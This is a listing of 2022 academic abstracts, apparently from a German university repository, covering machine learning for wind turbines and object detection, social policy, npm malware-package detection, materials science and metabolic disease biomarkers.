High-dimensional and multi-variate data from dynamical systems such as turbulent flows and wind turbines can be analyzed with deep learning due to its capacity to learn representations in lower-dimensional manifolds. Two challenges of interest arise from data generated from these systems, namely, how to anticipate wind turbine failures and how to better understand air flow through car ventilation systems. There are deep neural network architectures that can project data into a lower-dimensional space with the goal of identifying and understanding patterns that are not distinguishable in the original dimensional space. Learning data representations in lower dimensions via non-linear mappings allows one to perform data compression, data clustering (for anomaly detection), data reconstruction and synthetic data generation.
In this work, we explore the potential that variational autoencoders (VAE) have to learn low-dimensional data representations in order to tackle the problems posed by the two dynamical systems mentioned above. A VAE is a neural network architecture that combines the mechanisms of the standard autoencoder and variational bayes. The goal here is to train a neural network to minimize a loss function defined by a reconstruction term together with a variational term defined as a Kulback-Leibler (KL) divergence.
The report discusses the results obtained for the two different data domains: wind turbine time series and turbulence data from computational fluid dynamics (CFD) simulations.
We report on the reconstruction, clustering and unsupervised anomaly detection of wind turbine multi-variate time series data using a variant of a VAE called Variational Recurrent Autoencoder (VRAE). We trained a VRAE to cluster normal and abnormal wind turbine series (two class problem) as well as normal and multiple abnormal series (multi-class problem). We found that the model is capable of distinguishing between normal and abnormal cases by reducing the dimensionality of the input data and projecting it to two dimensions using techniques such as Principal Component Analysis (PCA) and t-distributed stochastic neighbor embedding (t-SNE). A set of anomaly scoring methods is applied on top of these latent vectors in order to compute unsupervised clustering. We have achieved an accuracy of up to 96% with the KM eans + + algorithm.
We also report the data reconstruction and generation results of two dimensional turbulence slices corresponding to CFD simulation of a HVAC air duct. For this, we have trained a Convolutional Variational Autoencoder (CVAE). We have found that the model is capable of reconstructing laminar flows up to a certain degree of resolution as well generating synthetic turbulence data from the learned latent distribution.
The Poverty Reduction Effect of Social Protection: The Pros and Cons of a Multidisciplinary Approach
(2022)
There is a growing body of knowledge on the complex effects of social protection on poverty in Africa. This article explores the pros and cons of a multidisciplinary approach to studying social protection policies. Our research aimed at studying the interaction between cash transfers and social health protection policies in terms of their impact on inclusive growth in Ghana and Kenya. Also, it explored the policy reform context over time to unravel programme dynamics and outcomes. The analysis combined econometric and qualitative impact assessments with national- and local-level political economic analyses. In particular, dynamic effects and improved understanding of processes are well captured by this approach, thus, pushing the understanding of implementation challenges over and beyond a ‘technological fix,’ as has been argued before by Niño-Zarazúa et al. (World Dev 40:163–176, 2012), However, multidisciplinary research puts considerable demands on data and data handling. Finally, some poverty reduction effects play out over a longer time, requiring longitudinal consistent data that is still scarce.
TSEM: Temporally Weighted Spatiotemporal Explainable Neural Network for Multivariate Time Series
(2022)
Deep learning has become a one-size-fits-all solution for technical and business domains thanks to its flexibility and adaptability. It is implemented using opaque models, which unfortunately undermines the outcome trustworthiness. In order to have a better understanding of the behavior of a system, particularly one driven by time series, a look inside a deep learning model so-called posthoc eXplainable Artificial Intelligence (XAI) approaches, is important. There are two major types of XAI for time series data, namely model-agnostic and model-specific. Model-specific approach is considered in this work. While other approaches employ either Class Activation Mapping (CAM) or Attention Mechanism, we merge the two strategies into a single system, simply called the Temporally Weighted Spatiotemporal Explainable Neural Network for Multivariate Time Series (TSEM). TSEM combines the capabilities of RNN and CNN models in such a way that RNN hidden units are employed as attention weights for the CNN feature maps temporal axis. The result shows that TSEM outperforms XCM. It is similar to STAM in terms of accuracy, while also satisfying a number of interpretability criteria, including causality, fidelity, and spatiotemporality.
Research-Practice-Collaborations Addressing One Health and Urban Transformation. A Case Study
(2022)
One Health is an integrative approach at the interface of humans, animals and the environment, which can be implemented as Research-Practice-Collaboration (RPC) for its interdisciplinarity and intersectoral focus on the co-production of knowledge. To exemplify this, the present commentary shows the example of the Forschungskolleg “One Health and Urban Transformation” funded by the Ministry of Culture and Science of the State Government of Nord Rhine Westphalia in Germany. After analysis, the factors identified for a better implementation of RPC for One Health were the ones that allowed for constant communication and the reduction of power asymmetries between practitioners and academics in the co-production of knowledge. In this light, the training of a new generation of scientists at the boundaries of different disciplines that have mediation skills between academia and practice is an important contribution with great implications for societal change that can aid the further development of RPC.
This 2nd edition compendium contains and explains essential statistical formulas within an economic context. Expanded by more than 100 pages compared to the 1st edition, the compendium has been supplemented with numerous additional practical examples, which will help readers to better understand the formulas and their practical applications. This statistical formulary is presented in a practice-oriented, clear, and understandable manner, as it is needed for meaningful and relevant application in global business, as well as in the academic setting and economic practice. (Verlagsangaben)
The purpose of the study is to provide empirical evidence about the under-researched area of university–government relations in building a culture of entrepreneurial initiatives inside the triple helix model in a rural region. The study deploys a qualitative case study research method based on the content analysis of project documentation and further internal documents both from universities and municipalities. The propositions in the research question are guided by the previous literature and were then analyzed through an “open coding” process to iteratively analyze, verify, and validate the results from the documents against the previous literature. Results presented in the case study are related both to the project of a municipality–university innovation partnership, as well as the historic development of the university in its three missions, and, related to the important third mission, themes relevant for the project. In addition, a “toolkit” of relevant project activities is presented against the major identified themes, major project stakeholders, as well as relevant Sustainable Development Goals (SDGs). Universities should look beyond a purely economic contribution and should augment all three missions (teaching, research, engagement) by considering social, environmental, and economic aspects of its activities. Instead of considering a government’s role solely as that of a regulator, a much more creative and purposeful cooperation between university and government is possible for creating a regional culture of entrepreneurial initiatives in a rural region.
Purpose: Both Hungary and Germany belong to the old-world wine-producing countries and have long winemaking traditions. This paper aims at exploring and comparing online branding strategies of family SME (small and medium sized enterprises) wineries at Lake Balaton (Hungary) and Lake Constance (Germany), as two wine regions with similar geographic characteristics.
Design/methodology/approach: This paper, based on a total sample of 37 family wineries, 15 at Lake Balaton and 22 at Lake Constance, investigates the differences in brand identity on the website, brand image in social media and online communication channels deployed in both wine regions. The study applies a qualitative methodology using MaxQDA software for conducting content analysis of texts in websites and social media. Descriptive statistics and t-test were conducted to compare the usage of different communication channels and determine statistical significance.
Findings: At Lake Balaton, the vineyard, the winery and the family, while at Lake Constance, the lake itself and the grape are highlighted regarding family winery brand identity. The customer-based brand image of Hungarian family wineries emphasizes wine, food and service, with the predominant use of Facebook. In the German family wineries, the focus of brand identity is on wine, friendliness and taste and includes more extensive usage of websites.
Originality/value: The paper deploys a novel methodology, both in terms of tools used as well as geographic focus to uncover online branding patterns of family wineries, thereby providing implications for wine and tourism industries at lake regions. It compares the share of selected most-used words in the overall text in websites and in social media, and presents the key findings from this innovative approach.
The purpose of the study is to provide empirical evidence about the under researched area of university-government relation in building a culture of entrepreneurial initiative inside triple helix model in a rural region. The study deploys a qualitative case study research method based on the content analysis of project documentation and further internal documents both from university and municipality.
State-of-the-art object detectors are treated as black boxes due to their highly non-linear internal computations. Even with unprecedented advancements in detector performance, the inability to explain how their outputs are generated limits their use in safety-critical applications. Previous work fails to produce explanations for both bounding box and classification decisions, and generally make individual explanations for various detectors. In this paper, we propose an open-source Detector Explanation Toolkit (DExT) which implements the proposed approach to generate a holistic explanation for all detector decisions using certain gradient-based explanation methods. We suggests various multi-object visualization methods to merge the explanations of multiple objects detected in an image as well as the corresponding detections in a single image. The quantitative evaluation show that the Single Shot MultiBox Detector (SSD) is more faithfully explained compared to other detectors regardless of the explanation methods. Both quantitative and human-centric evaluations identify that SmoothGrad with Guided Backpropagation (GBP) provides more trustworthy explanations among selected methods across all detectors. We expect that DExT will motivate practitioners to evaluate object detectors from the interpretability perspective by explaining both bounding box and classification decisions.
21 pages, with supplementary
As cameras are ubiquitous in autonomous systems, object detection is a crucial task. Object detectors are widely used in applications such as autonomous driving, healthcare, and robotics. Given an image, an object detector outputs both the bounding box coordinates as well as classification probabilities for each object detected. The state-of-the-art detectors are treated as black boxes due to their highly non-linear internal computations. Even with unprecedented advancements in detector performance, the inability to explain how their outputs are generated limits their use in safety-critical applications in particular. It is therefore crucial to explain the reason behind each detector decision in order to gain user trust, enhance detector performance, and analyze their failure.
Previous work fails to explain as well as evaluate both bounding box and classification decisions individually for various detectors. Moreover, no tools explain each detector decision, evaluate the explanations, and also identify the reasons for detector failures. This restricts the flexibility to analyze detectors. The main contribution presented here is an open-source Detector Explanation Toolkit (DExT). It is used to explain the detector decisions, evaluate the explanations, and analyze detector errors. The detector decisions are explained visually by highlighting the image pixels that most influence a particular decision. The toolkit implements the proposed approach to generate a holistic explanation for all detector decisions using certain gradient-based explanation methods. To the author’s knowledge, this is the first work to conduct extensive qualitative and novel quantitative evaluations of different explanation methods across various detectors. The qualitative evaluation incorporates a visual analysis of the explanations carried out by the author as well as a human-centric evaluation. The human-centric evaluation includes a user study to understand user trust in the explanations generated across various explanation methods for different detectors. Four multi-object visualization methods are provided to merge the explanations of multiple objects detected in an image as well as the corresponding detector outputs in a single image. Finally, DExT implements the procedure to analyze detector failures using the formulated approach.
The visual analysis illustrates that the ability to explain a model is more dependent on the model itself than the actual ability of the explanation method. In addition, the explanations are affected by the object explained, the decision explained, detector architecture, training data labels, and model parameters. The results of the quantitative evaluation show that the Single Shot MultiBox Detector (SSD) is more faithfully explained compared to other detectors regardless of the explanation methods. In addition, a single explanation method cannot generate more faithful explanations than other methods for both the bounding box and the classification decision across different detectors. Both the quantitative and human-centric evaluations identify that SmoothGrad with Guided Backpropagation (GBP) provides more trustworthy explanations among selected methods across all detectors. Finally, a convex polygon-based multi-object visualization method provides more human-understandable visualization than other methods.
The author expects that DExT will motivate practitioners to evaluate object detectors from the interpretability perspective by explaining both bounding box and classification decisions.
Graph databases employ graph structures such as nodes, attributes and edges to model and store relationships among data. To access this data, graph query languages (GQL) such as Cypher are typically used, which might be difficult to master for end-users. In the context of relational databases, sequence to SQL models, which translate natural language questions to SQL queries, have been proposed. While these Neural Machine Translation (NMT) models increase the accessibility of relational databases, NMT models for graph databases are not yet available mainly due to the lack of suitable parallel training data. In this short paper we sketch an architecture which enables the generation of synthetic training data for the graph query language Cypher.
Trojanized software packages used in software supply chain attacks constitute an emerging threat. Unfortunately, there is still a lack of scalable approaches that allow automated and timely detection of malicious software packages and thus most detections are based on manual labor and expertise. However, it has been observed that most attack campaigns comprise multiple packages that share the same or similar malicious code. We leverage that fact to automatically reproduce manually identified clusters of known malicious packages that have been used in real world attacks, thus, reducing the need for expert knowledge and manual inspection. Our approach, AST Clustering using MCL to mimic Expertise (ACME), yields promising results with a 𝐹1 score of 0.99. Signatures are automatically generated based on characteristic code fragments from clusters and are subsequently used to scan the whole npm registry for unreported malicious packages. We are able to identify and report six malicious packages that have been removed from npm consequentially. Therefore, our approach can support the detection by reducing manual labor and hence may be employed by maintainers of package repositories to detect possible software supply chain attacks through trojanized software packages.
The corporate landscape is experiencing an increasing change in business models due to digitization. An increasing availability of data along the business processes enhance the opportunities for process automation. Technologies such as Robotic Process Automation (RPA) are widely used for business process optimization, but as a side effect an increase in stand-alone solutions and a lack of holistic approaches can be observed. Intelligent Process Automation (IPA) is said to support more complex processes and enable automated decision-making, but due to the lack of connectors makes the implementation difficult. RPA marketplaces can be a bridging technology to help companies implement Intelligent Process Automation. This paper explores the drivers and challenges for the adoption of RPA marketplaces to realize IPA. For this purpose, we conducted ten expert interviews with decision makers and IT staff from the process automation sector.
We benchmark the robustness of maximum likelihood based uncertainty estimation methods to outliers in training data for regression tasks. Outliers or noisy labels in training data results in degraded performances as well as incorrect estimation of uncertainty. We propose the use of a heavy-tailed distribution (Laplace distribution) to improve the robustness to outliers. This property is evaluated using standard regression benchmarks and on a high-dimensional regression task of monocular depth estimation, both containing outliers. In particular, heavy-tailed distribution based maximum likelihood provides better uncertainty estimates, better separation in uncertainty for out-of-distribution data, as well as better detection of adversarial attacks in the presence of outliers.
In the field of autonomous robotics, sensors have played a major role in defining the scope of technology and to a great extent, limitations of it as well. This cycle of constant updates and hence technological advancement has made given birth to some serious industries which were once inconceivable. Industries like autonomous driving which has a serious impact on safety and security of people, also has an equally harsh implication on the dynamics and economics of the market. With sensors like LiDAR and RADAR delivering 3D measurements as point clouds, there is a necessity to process the raw measurements directly and many research groups are working on the same. A sizable research has gone in solving the task of object detection on 2D images. In this thesis we aim to develop a LiDAR based 3D object detection scheme. We combine the ideas of PointPillars and feature pyramid networks from 2D vision to propose Pillar-FPN. The proposed method directly takes 3D point clouds as input and outputs a 3D bounding box. Our pipeline consists of multiple variations of proposed Pillar-FPN at the feature fusion level that are described in the results section. We have trained our model on the KITTI train dataset and evaluated it on KITTI validation dataset.
A precise characterization of substances is essential for the safe handling of explosives. One parameter regularly characterized is the impact sensitivity. This is typically determined using a drop hammer. However, the results can vary depending on the test method and even the operator, and it is not possible to distinguish the type of decomposition such as detonation and deflagration. This study monitors the reaction progress by constructing a drop hammer to measure the decomposition reaction of four different primary explosives (tetrazene, silver azide, lead azide, lead styphnate) in order to determine the reproducibility of this method. Additionally, further possible evaluation methods are explored to improve on the current binary statistical analysis. To determine whether classification was possible based on extracted features, the responses of equipped sensor arrays, which measure and monitor the reactions, were studied and evaluated. Features were extracted from this data and were evaluated using multivariate methods such as principal component analysis (PCA) and linear discriminant analysis (LDA). The results indicate that although the measurements show substance specific trends, they also show a large scatter for each substance. By reducing the dimensions of the extracted features, different sample clusters can be represented and the calculated loadings allow significant parameters to be determined for classification. The results also suggest that differentiation of different reaction mechanisms is feasible. Testing of the regressor function shows reliable results considering the comparatively small amount of data.
Bonding wires made of aluminum are the most used materials for the transmission of electrical signals in power electronic devices. During operation, different cyclic mechanical and thermal stresses can lead to fatigue loads and a failure of the bonding wires. A prediction or prevention of the wire failure is not yet possible by design for all cases. The following work presents meaningful fatigue tests in small wire dimensions and investigates the influence of the R-ratio on the lifetime of two different aluminum wires with a diameter of 300 μm each. The experiments show very reproducible fatigue results with ductile failure behavior. The endurable stress amplitude decreases linearly with an increasing stress ratio, which can be displayed by a Smith diagram, even though the applied maximum stresses exceed the initial yield stresses determined by tensile tests. A scaling of the fatigue results by the tensile strength indicates that the fatigue level is significantly influenced by the strength of the material. Due to the very consistent findings, the development of a generalized fatigue model for predicting the lifetime of bonding wires with an arbitrary loading situation seems to be possible and will be further investigated.
The utilization of simulation procedures is gaining increasing attention in the product development of extrusion blow molded parts. However, some simulation steps, like the simulation of shrinkage and warpage, are still associated with uncertainties. The reason for this is on the one hand a lack of standardized interfaces for the transfer of simulation data between different simulation tools, and on the other hand the complex time-, temperature- and process-dependent material behavior of the used semi crystalline polymers. Using a new vendor neutral interface standard for the data transfer, the shrinkage analysis of a simple blow molded part is investigated and compared to experimental data. A linear viscoelastic material model in combination with an orthotropic process- and temperature-dependent thermal expansion coefficient is used for the shrinkage prediction. A good agreement is observed. Finally, critical parameters in the simulation models that strongly influence the shrinkage analysis are identified by a sensitivity study.
Characterization methods of pressure sensitive adhesives (PSA) originate from technical bonding and do not cover relevant data for the development and quality assurance of medical applications, where PSA with flexible backing layers are adopted to human skin. In this study, a new method called RheoTack is developed to determine (mechanically and optically) an adhesion and detaching behavior of flexible and transparent PSA based patches. Transdermal therapeutic systems (TTS) consisting of silicone-based PSAs on a flexible and transparent backing layer were tested on a rotational rheometer with an 8 mm plate as a probe rod at retraction speeds of 0.01, 0.1, and 1 mm/s with respect to their adhesion and detaching behavior in terms of force-retraction displacement curves. The curves consist of a compression phase to affirm wetting; a tensile deformation phase intercepting stretching, cavity, and fibril formation; and a failure phase with detaching. Their analysis provides values for stiffness, force, and displacement of the beginning of fibril formation, force and displacement of the beginning of a failure due to fibril breakage and detaching, as well as corresponding activation energies. All these parameters exhibit the pronounced dependency on the retraction speed. The force-retraction displacement curves together with the simultaneous video recordings of the TTS deformation from three different angles (three cameras) provide deeper insight into the deformation processes and allow for interpreting the properties’ characteristics for PSA applications.
West Africa has great potential for the use of solar energy systems, as it has both a high solar radiation rate and a lack of energy production. West Africa is a very aerosol-rich region, whose effects on photovoltaic (PV) use are due to both atmospheric conditions and existing solar technology. This study reports the variability of aerosol optical properties in the city of Koforidua, Ghana over the period 2016 to 2020, and their impact on the radiation intensity and efficiency of a PV cell. The study used AERONET ground (Giles et al., 2019) and satellite data produced by CAMS (Gschwind, et al., 2019), which both provide aerosol optical depth (AOD) and metrological parameters used for radiative transfer calculations with libRadtran (Emde, et al., 2016). A spectrally resolved PV model (Herman-Czezuch et al., 2022) is then used to calculate the PV yield of two PV technologies: polycrystalline and amorphous silicon. It is observed that for both data sets, the aerosol is mainly composed of dust and organic matter, with a very increased AOD load during the harmattan period (December-February), also due to the fires observed during this period.
In her recent article, Bender discusses several aspects of research–practice–collaborations (RPCs). In this commentary, we apply Bender's arguments to experiences in engineering research and development (R&D). We investigate the influence of interaction with practice partners on relevance, credibility, and legitimacy in the special engineering field of product development and analyze which methodological approaches are already being pursued for dealing with diverging interests and asymmetries and which steps will be necessary to include interests of civil society beyond traditional customer relations.
Effective Neighborhood Feature Exploitation in Graph CNNs for Point Cloud Object-Part Segmentation
(2022)
Part segmentation is the task of semantic segmentation applied on objects and carries a wide range of applications from robotic manipulation to medical imaging. This work deals with the problem of part segmentation on raw, unordered point clouds of 3D objects. While pioneering works on deep learning for point clouds typically ignore taking advantage of local geometric structure around individual points, the subsequent methods proposed to extract features by exploiting local geometry have not yielded significant improvements either. In order to investigate further, a graph convolutional network (GCN) is used in this work in an attempt to increase the effectiveness of such neighborhood feature exploitation approaches. Most of the previous works also focus only on segmenting complete point cloud data. Considering the impracticality of such approaches, taking into consideration the real world scenarios where complete point clouds are scarcely available, this work proposes approaches to deal with partial point cloud segmentation.
In the attempt to better capture neighborhood features, this work proposes a novel method to learn regional part descriptors which guide and refine the segmentation predictions. The proposed approach helps the network achieve state-of-the-art performance of 86.4% mIoU on the ShapeNetPart dataset for methods which do not use any preprocessing techniques or voting strategies. In order to better deal with partial point clouds, this work also proposes new strategies to train and test on partial data. While achieving significant improvements compared to the baseline performance, the problem of partial point cloud segmentation is also viewed through an alternate lens of semantic shape completion.
Semantic shape completion networks not only help deal with partial point cloud segmentation but also enrich the information captured by the system by predicting complete point clouds with corresponding semantic labels for each point. To this end, a new network architecture for semantic shape completion is also proposed based on point completion network (PCN) which takes advantage of a graph convolution based hierarchical decoder for completion as well as segmentation. In addition to predicting complete point clouds, results indicate that the network is capable of reaching within a margin of 5% to the mIoU performance of dedicated segmentation networks for partial point cloud segmentation.
The research examines Generation Z’s (Gen Z’s) attitudes, behavior and awareness regarding sustainability-oriented products in two European countries, located in the region of Western Balkans, Bosnia–Herzegovina and Serbia. The research deploys generational cohort theory (GCT) and a quantitative analysis of primary data collected through an online questionnaire among 1338 primary, high school and university students, all belonging to Generation Z. It deploys a Confirmatory Factor Analysis (CFA) by running both Maximum Likelihood (ML) and Markov Chain Monte Carlo (MCMC) procedures, the latter being suitable for binary variables, which have been deployed in the study. The results of MLCFA provide evidence that there is a statistically significant and relatively strong relation between sustainability and circular economy attitudes (SCEA) and sustainability and circular economy behavior (SCEB), while there is a statistically insignificant and relatively weak relation between sustainability and circular economy behavior (SCEB) and circular economy awareness (CEW). The results of the BCFA, which is based on MCMC procedure, are similar to the results based on a rather commonly used MLCFA procedure. The results also confirm that Gen Z knows more about the companies which recycle products than it does about the CE as a concept, while the vast majority is concerned about the future of the planet and is motivated to learn more about the CE through CE and various awareness-raising measures.
Technical aspects are brought into focus thinking of inclusion opportunities and exclusion risks in digital learning scenarios. However, focussing on technical limitations is not sufficient. This contribution describes another important field of inclusion, namely psychological personality traits. In a longitudinal study at the Hochschule Bonn-Rhein-Sieg (H-BRS), University of Applied Sciences, we accompanied a civil law lecture of a bachelor's degree programme, which had been digitalized because of COVID-19, with empirical Scholarship of Teaching and Learning methods for two semesters. N=55 students from the first measured semester and N=35 from the second one rated different digital teaching methods used in the developed digital learning scenario. Their personality traits according to the five-factor model were measured by using a validated psychometric short-scale (BFI-10). Moderate to large empirical effects of the students' personality traits on the assessments of different digital teaching methods, used in the digital learning scenario, could be observed. Neuroticism values influences the perceptions of the course difficulty and the preference for using an instant messenger as a central communication platform, where students can interact with fellows and lecturers in a way the students are used to in their daily life. High conscientiousness predicts a more regular execution of the weekly tasks given throughout the semester, while higher values in extraversion are associated with a preference for synchronous video conference sessions and active webcams. Higher agreeableness is associated with rating the learning atmosphere as more constructive while low values are associated with perceiving more negative consequences due to the reduced contact to fellows based on COVID-19 restrictions. Correlations between the dimension openness and any ratings of digital teaching methods could not be observed. With this insight into our students' personality traits, we were able to match the digital teaching methods used in our digital learning scenario to the psychological needs of our students, which resulted in a higher inclusion level and a reduction of exclusion risks.
Hydrogen‐Bonded Cholesteric Liquid Crystals—A Modular Approach Toward Responsive Photonic Materials
(2022)
A supramolecular approach for photonic materials based on hydrogen-bonded cholesteric liquid crystals is presented. The modular toolbox of low-molecular-weight hydrogen-bond donors and acceptors provides a simple route toward liquid crystalline materials with tailor-made thermal and photonic properties. Initial studies reveal broad application potential of the liquid crystalline thin films for chemo- and thermosensing. The chemosensing performance is based on the interruption of the intermolecular forces between the donor and acceptor moieties by interference with halogen-bond donors. Future studies will expand the scope of analytes and sensing in aqueous media. In addition, the implementation of the reported materials in additive manufacturing and printed photonic devices is planned.
Using a life-cycle approach, we identify key gaps for social reform in Georgia. The reduction of informal work is the most pressing of these, since formal employment is the backbone of any robust and reliable social insurance scheme. At the same time, greater financial resources are required through taxation in order to enable systematic social reform in Georgia. Both interventions are needed in order to fill the gaps in the current social protection system, which include the limited scope of pension and health insurance, as well as the lack of permanent unemployment insurance and universal child benefits.
Against the background of Germany’s long experience with social protection, we outline the main principles of the German welfare state and present the design of three main social insurance branches (pensions, health and unemployment). Based on the mixed experience that has emerged in Germany, in particular due to path dependencies and political deadlock, we derive lessons that inform a clear and coherent vision for social reform in Georgia.
There is an unmet need for the development and validation of biomarkers and surrogate endpoints for clinical trials in propionic acidemia (PA) and methylmalonic acidemia (MMA). This review examines the pathophysiology and clinical consequences of PA and MMA that could form the basis for potential biomarkers and surrogate endpoints. Changes in primary metabolites such as methylcitric acid (MCA), MCA:citric acid ratio, oxidation of 13C-propionate (exhaled 13CO2), and propionylcarnitine (C3) have demonstrated clinical relevance in patients with PA or MMA. Methylmalonic acid, another primary metabolite, is a potential biomarker, but only in patients with MMA. Other potential biomarkers in patients with either PA and MMA include secondary metabolites, such as ammonium, or the mitochondrial disease marker, fibroblast growth factor 21. Additional research is needed to validate these biomarkers as surrogate endpoints, and to determine whether other metabolites or markers of organ damage could also be useful biomarkers for clinical trials of investigational drug treatments in patients with PA or MMA. This review examines the evidence supporting a variety of possible biomarkers for drug development in propionic and methylmalonic acidemias.
From Conclusion to Coda
(2022)